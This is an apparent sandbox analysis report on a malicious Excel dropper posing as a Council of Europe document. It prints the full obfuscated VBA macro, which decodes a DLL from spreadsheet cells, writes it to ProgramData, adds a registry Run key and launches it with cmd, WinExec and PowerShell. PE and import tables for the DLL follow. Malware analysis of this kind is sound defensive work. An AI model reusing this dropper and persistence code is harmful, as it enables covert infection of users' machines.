VTI SCORE: 95/100
Dynamic Analysis Report
Classification: Keylogger, Dropper
Threat Names: -
Sample: Council-of-Europe-.xls (Excel Document)
Created at 2020-04-08T20:44:00
Filename | Category | Type | Severity |
---|---|---|---|
C:\Users\aETAdzjz\Desktop\Council-of-Europe-.xls | Sample File | Excel Document | Malicious |
Office Information
Field | Value |
---|---|
Create Time | 2015-06-05 18:17:20+00:00 |
Modify Time | 2020-04-07 07:54:22+00:00 |
Document Information
Field | Value |
---|---|
Codepage | ANSI_Latin1 |
Application | Microsoft Excel |
App Version | 15.0 |
Document Security | NONE |
Titles Of Parts | Sheet1, Sheet2 |
scale_crop | False |
shared_doc | False |
Controls (1)
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{00020820-0000-0000-C000-000000000046} | Excel97Sheet | - |
VBA Macros (2)
Macro #1: Module1
```vba
Attribute VB_Name = "Module1"
Sub sa()
End Sub
```
Macro #2: ThisWorkbook
```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function SZpmrPBsT(h)
Dim a: a = Split(h)
Dim i
For i = 0 To UBound(a)
a(i) = Chr("&H" & a(i))
Next
h2s = Join(a, "")
SZpmrPBsT = h2s
End Function
Sub Workbook_Open()
mykk = "qnZeVsoOpmeN"
Dim g
d = "MsgBox ('Invalid User and Passwdord')"
Dim AC
For i = 1 To 70
Celles = "A" + CStr(i)
A1 = ThisWorkbook.Sheets("Sheet2").Range(Celles).Value
If A1 = "" Then
Exit For
End If
AC = AC + A1
Next i
Dim o
d = "MsgBox ('Please login')"
Set Ofile = CreateObject("Scripting.FileSystemObject")
o = xoAOvMNPSVo(mykk, AC)
Dim dd
dd = SZpmrPBsT("43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c")
lkd = hMqirSfTAmm(o)
Set WText = Ofile.CreateTextFile(dd)
WText.WriteLine Left(lkd, Len(lkd) - 1)
WText.Close
Dim func
func = SZpmrPBsT("43 41 4c 4c")
Dim lib
lib = SZpmrPBsT("4b 65 72 6e 65 6c 33 32")
Dim ok
ok = SZpmrPBsT("57 69 6e 45 78 65 63")
Dim go
Dim goo
goo = SZpmrPBsT("52 45 47 20 41 44 44 20 48 4b 43 55 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 52 75 6e 20 2f 76 20 41 75 74 6f 53 74 61 72 74 20 2f 74 20 52 45 47 5f 53 5a 20 2f 64 20 22 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c 2c 53 74 61 72 74 22")
Set WText = Ofile.CreateTextFile(SZpmrPBsT("43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 74 74 2e 62 61 74"))
WText.WriteLine goo
WText.Close
Dim lets
lets = SZpmrPBsT("63 6d 64 2e 65 78 65 20 2f 63 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 74 74 2e 62 61 74")
Application.ExecuteExcel4Macro Replace(Replace(Replace(Replace("{{}}(""[]"", ""{^}"", ""JCCJ"", ""[*]"", 0)", "{{}}", func), "[]", lib), "{^}", ok), "[*]", lets)
go = SZpmrPBsT("70 6f 77 65 72 73 68 65 6c 6c 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c 2c 53 74 61 72 74")
Application.ExecuteExcel4Macro Replace(Replace(Replace(Replace("{{}}(""[]"", ""{^}"", ""JCCJ"", ""[*]"", 0)", "{{}}", func), "[]", lib), "{^}", ok), "[*]", go)
d = "MsgBox ('This is a valid password.')"
End Sub
Function xoAOvMNPSVo(yy, msg)
Dim outre
Dim intCoun
a = Split(msg, ",")
msg_len = UBound(a)
Dim x
For x = 0 To msg_len
key_a = Mid(yy, intCoun + 1, 1)
If intCoun = Len(yy) Then
intCoun = 0
key_a = Mid(yy, intCoun + 1, 1)
End If
intCoun = intCoun + 1
Dim ll
ll = CInt("&H" & Replace(a(x), "0x", ""))
fg = ll - (Asc(key_a) + 256) Mod 256
gdd_a = Chr(fg)
outre = outre + gdd_a
Next
xoAOvMNPSVo = outre
End Function
Function hMqirSfTAmm(ss)
brt = SZpmrPBsT("41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f")
Dim stringlen, resOut, grpBegin
stringlen = Len(ss) - 1
newstring = Left(ss, stringlen)
For grpBegin = 1 To stringlen Step 4
Dim numDataBytes, CharCounter, Oo, Pp, nGcount, pOut
numDataBytes = 3
nGcount = 0
For CharCounter = 0 To 3
Oo = Mid(newstring, grpBegin + CharCounter, 1)
If Oo = "=" Then
numDataBytes = numDataBytes - 1
Pp = 0
Else
Pp = InStr(1, brt, Oo, vbBinaryCompare) - 1
End If
Dim tr
tr = 64 * nGcount
nGcount = tr + Pp
Next
nGcount = Hex(nGcount)
Dim ds
ds = String(6 - Len(nGcount), "0")
nGcount = ds & nGcount
Dim po
po = CByte("&H" & Mid(nGcount, 1, 2))
pOut = Chr(po)
pOut = pOut + Chr(CByte("&H" & Mid(nGcount, 3, 2)))
pOut = pOut + Chr(CByte("&H" & Mid(nGcount, 5, 2)))
resOut = resOut & Left(pOut, numDataBytes)
Next
hMqirSfTAmm = resOut
End Function
```
YARA Matches (1)
Rule Name | Rule Description | Classification | Score |
---|---|---|---|
VBA_Create_File | VBA macro contains file creation commands; possible dropper | - | 2/5 |
PE Information
Field | Value |
---|---|
Image Base | 0x10000000 |
Entry Point | 0x1000f046 |
Size Of Code | 0x26a00 |
Size Of Initialized Data | 0x14e00 |
File Type | FileType.dll |
Subsystem | Subsystem.windows_cui |
Machine Type | MachineType.i386 |
Compile Timestamp | 2020-04-06 11:07:00+00:00 |
Sections (6)
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x10001000 | 0x26813 | 0x26a00 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.62 |
.rdata | 0x10028000 | 0xf3c6 | 0xf400 | 0x26e00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.63 |
.data | 0x10038000 | 0x1d28 | 0xe00 | 0x36200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.72 |
.tls | 0x1003a000 | 0x13a5 | 0x1400 | 0x37000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
.rsrc | 0x1003c000 | 0x1e0 | 0x200 | 0x38400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.72 |
.reloc | 0x1003d000 | 0x24d8 | 0x2600 | 0x38600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.5 |
Imports (6)
KERNEL32.dll (82)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CreatePipe | 0x0 | 0x10028018 | 0x36b64 | 0x35964 | 0xda |
PeekNamedPipe | 0x0 | 0x1002801c | 0x36b68 | 0x35968 | 0x413 |
MultiByteToWideChar | 0x0 | 0x10028020 | 0x36b6c | 0x3596c | 0x3e0 |
CloseHandle | 0x0 | 0x10028024 | 0x36b70 | 0x35970 | 0x84 |
CreateProcessW | 0x0 | 0x10028028 | 0x36b74 | 0x35974 | 0xe2 |
WriteFile | 0x0 | 0x1002802c | 0x36b78 | 0x35978 | 0x5fc |
CreateFileW | 0x0 | 0x10028030 | 0x36b7c | 0x3597c | 0xc8 |
WideCharToMultiByte | 0x0 | 0x10028034 | 0x36b80 | 0x35980 | 0x5e8 |
ReadFile | 0x0 | 0x10028038 | 0x36b84 | 0x35984 | 0x463 |
GetComputerNameW | 0x0 | 0x1002803c | 0x36b88 | 0x35988 | 0x1da |
GetVersion | 0x0 | 0x10028040 | 0x36b8c | 0x3598c | 0x30f |
FlushFileBuffers | 0x0 | 0x10028044 | 0x36b90 | 0x35990 | 0x19a |
SetFilePointerEx | 0x0 | 0x10028048 | 0x36b94 | 0x35994 | 0x512 |
GetConsoleMode | 0x0 | 0x1002804c | 0x36b98 | 0x35998 | 0x1f7 |
GetConsoleCP | 0x0 | 0x10028050 | 0x36b9c | 0x3599c | 0x1e5 |
HeapSize | 0x0 | 0x10028054 | 0x36ba0 | 0x359a0 | 0x344 |
SetStdHandle | 0x0 | 0x10028058 | 0x36ba4 | 0x359a4 | 0x539 |
Sleep | 0x0 | 0x1002805c | 0x36ba8 | 0x359a8 | 0x56a |
VirtualAlloc | 0x0 | 0x10028060 | 0x36bac | 0x359ac | 0x5b3 |
FreeEnvironmentStringsW | 0x0 | 0x10028064 | 0x36bb0 | 0x359b0 | 0x1a5 |
GetEnvironmentStringsW | 0x0 | 0x10028068 | 0x36bb4 | 0x359b4 | 0x230 |
GetCommandLineW | 0x0 | 0x1002806c | 0x36bb8 | 0x359b8 | 0x1d2 |
WriteConsoleW | 0x0 | 0x10028070 | 0x36bbc | 0x359bc | 0x5fb |
VirtualFree | 0x0 | 0x10028074 | 0x36bc0 | 0x359c0 | 0x5b6 |
EnterCriticalSection | 0x0 | 0x10028078 | 0x36bc4 | 0x359c4 | 0x12d |
LeaveCriticalSection | 0x0 | 0x1002807c | 0x36bc8 | 0x359c8 | 0x3b0 |
DeleteCriticalSection | 0x0 | 0x10028080 | 0x36bcc | 0x359cc | 0x10c |
EncodePointer | 0x0 | 0x10028084 | 0x36bd0 | 0x359d0 | 0x129 |
DecodePointer | 0x0 | 0x10028088 | 0x36bd4 | 0x359d4 | 0x105 |
SetLastError | 0x0 | 0x1002808c | 0x36bd8 | 0x359d8 | 0x521 |
InitializeCriticalSectionAndSpinCount | 0x0 | 0x10028090 | 0x36bdc | 0x359dc | 0x354 |
CreateEventW | 0x0 | 0x10028094 | 0x36be0 | 0x359e0 | 0xbc |
TlsAlloc | 0x0 | 0x10028098 | 0x36be4 | 0x359e4 | 0x58b |
TlsGetValue | 0x0 | 0x1002809c | 0x36be8 | 0x359e8 | 0x58d |
TlsSetValue | 0x0 | 0x100280a0 | 0x36bec | 0x359ec | 0x58e |
TlsFree | 0x0 | 0x100280a4 | 0x36bf0 | 0x359f0 | 0x58c |
GetSystemTimeAsFileTime | 0x0 | 0x100280a8 | 0x36bf4 | 0x359f4 | 0x2e1 |
GetModuleHandleW | 0x0 | 0x100280ac | 0x36bf8 | 0x359f8 | 0x270 |
GetProcAddress | 0x0 | 0x100280b0 | 0x36bfc | 0x359fc | 0x2a6 |
LCMapStringW | 0x0 | 0x100280b4 | 0x36c00 | 0x35a00 | 0x3a4 |
GetLocaleInfoW | 0x0 | 0x100280b8 | 0x36c04 | 0x35a04 | 0x25d |
GetStringTypeW | 0x0 | 0x100280bc | 0x36c08 | 0x35a08 | 0x2cf |
GetCPInfo | 0x0 | 0x100280c0 | 0x36c0c | 0x35a0c | 0x1bc |
SetEvent | 0x0 | 0x100280c4 | 0x36c10 | 0x35a10 | 0x505 |
ResetEvent | 0x0 | 0x100280c8 | 0x36c14 | 0x35a14 | 0x4b6 |
WaitForSingleObjectEx | 0x0 | 0x100280cc | 0x36c18 | 0x35a18 | 0x5c5 |
UnhandledExceptionFilter | 0x0 | 0x100280d0 | 0x36c1c | 0x35a1c | 0x59a |
SetUnhandledExceptionFilter | 0x0 | 0x100280d4 | 0x36c20 | 0x35a20 | 0x55b |
GetCurrentProcess | 0x0 | 0x100280d8 | 0x36c24 | 0x35a24 | 0x212 |
TerminateProcess | 0x0 | 0x100280dc | 0x36c28 | 0x35a28 | 0x579 |
IsProcessorFeaturePresent | 0x0 | 0x100280e0 | 0x36c2c | 0x35a2c | 0x37b |
IsDebuggerPresent | 0x0 | 0x100280e4 | 0x36c30 | 0x35a30 | 0x374 |
GetStartupInfoW | 0x0 | 0x100280e8 | 0x36c34 | 0x35a34 | 0x2c8 |
QueryPerformanceCounter | 0x0 | 0x100280ec | 0x36c38 | 0x35a38 | 0x43e |
GetCurrentProcessId | 0x0 | 0x100280f0 | 0x36c3c | 0x35a3c | 0x213 |
GetCurrentThreadId | 0x0 | 0x100280f4 | 0x36c40 | 0x35a40 | 0x217 |
InitializeSListHead | 0x0 | 0x100280f8 | 0x36c44 | 0x35a44 | 0x358 |
RtlUnwind | 0x0 | 0x100280fc | 0x36c48 | 0x35a48 | 0x4c2 |
RaiseException | 0x0 | 0x10028100 | 0x36c4c | 0x35a4c | 0x453 |
GetLastError | 0x0 | 0x10028104 | 0x36c50 | 0x35a50 | 0x259 |
FreeLibrary | 0x0 | 0x10028108 | 0x36c54 | 0x35a54 | 0x1a6 |
LoadLibraryExW | 0x0 | 0x1002810c | 0x36c58 | 0x35a58 | 0x3b6 |
InterlockedFlushSList | 0x0 | 0x10028110 | 0x36c5c | 0x35a5c | 0x361 |
HeapAlloc | 0x0 | 0x10028114 | 0x36c60 | 0x35a60 | 0x33b |
HeapReAlloc | 0x0 | 0x10028118 | 0x36c64 | 0x35a64 | 0x342 |
HeapFree | 0x0 | 0x1002811c | 0x36c68 | 0x35a68 | 0x33f |
ExitProcess | 0x0 | 0x10028120 | 0x36c6c | 0x35a6c | 0x159 |
GetModuleHandleExW | 0x0 | 0x10028124 | 0x36c70 | 0x35a70 | 0x26f |
GetModuleFileNameA | 0x0 | 0x10028128 | 0x36c74 | 0x35a74 | 0x26b |
GetACP | 0x0 | 0x1002812c | 0x36c78 | 0x35a78 | 0x1ad |
GetStdHandle | 0x0 | 0x10028130 | 0x36c7c | 0x35a7c | 0x2ca |
GetFileType | 0x0 | 0x10028134 | 0x36c80 | 0x35a80 | 0x247 |
IsValidLocale | 0x0 | 0x10028138 | 0x36c84 | 0x35a84 | 0x382 |
GetUserDefaultLCID | 0x0 | 0x1002813c | 0x36c88 | 0x35a88 | 0x308 |
EnumSystemLocalesW | 0x0 | 0x10028140 | 0x36c8c | 0x35a8c | 0x14f |
GetProcessHeap | 0x0 | 0x10028144 | 0x36c90 | 0x35a90 | 0x2ac |
FindClose | 0x0 | 0x10028148 | 0x36c94 | 0x35a94 | 0x170 |
FindFirstFileExA | 0x0 | 0x1002814c | 0x36c98 | 0x35a98 | 0x175 |
FindNextFileA | 0x0 | 0x10028150 | 0x36c9c | 0x35a9c | 0x185 |
IsValidCodePage | 0x0 | 0x10028154 | 0x36ca0 | 0x35aa0 | 0x380 |
GetOEMCP | 0x0 | 0x10028158 | 0x36ca4 | 0x35aa4 | 0x28f |
GetCommandLineA | 0x0 | 0x1002815c | 0x36ca8 | 0x35aa8 | 0x1d1 |
USER32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
wsprintfW | 0x0 | 0x10028164 | 0x36cb0 | 0x35ab0 | 0x3ac |
ADVAPI32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetUserNameA | 0x0 | 0x10028000 | 0x36b4c | 0x3594c | 0x179 |
bcrypt.dll (7)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
BCryptHashData | 0x0 | 0x1002816c | 0x36cb8 | 0x35ab8 | 0x23 |
BCryptFinishHash | 0x0 | 0x10028170 | 0x36cbc | 0x35abc | 0x1b |
BCryptOpenAlgorithmProvider | 0x0 | 0x10028174 | 0x36cc0 | 0x35ac0 | 0x27 |
BCryptGetProperty | 0x0 | 0x10028178 | 0x36cc4 | 0x35ac4 | 0x21 |
BCryptCreateHash | 0x0 | 0x1002817c | 0x36cc8 | 0x35ac8 | 0x6 |
BCryptCloseAlgorithmProvider | 0x0 | 0x10028180 | 0x36ccc | 0x35acc | 0x2 |
BCryptDestroyHash | 0x0 | 0x10028184 | 0x36cd0 | 0x35ad0 | 0xd |
DNSAPI.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
DnsQuery_A | 0x0 | 0x10028008 | 0x36b54 | 0x35954 | 0x5f |
IPHLPAPI.DLL (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetAdaptersInfo | 0x0 | 0x10028010 | 0x36b5c | 0x3595c | 0x40 |
Exports (1)
API Name | EAT Address | Ordinal |
---|---|---|
Start | 0x63b0 | 0x1 |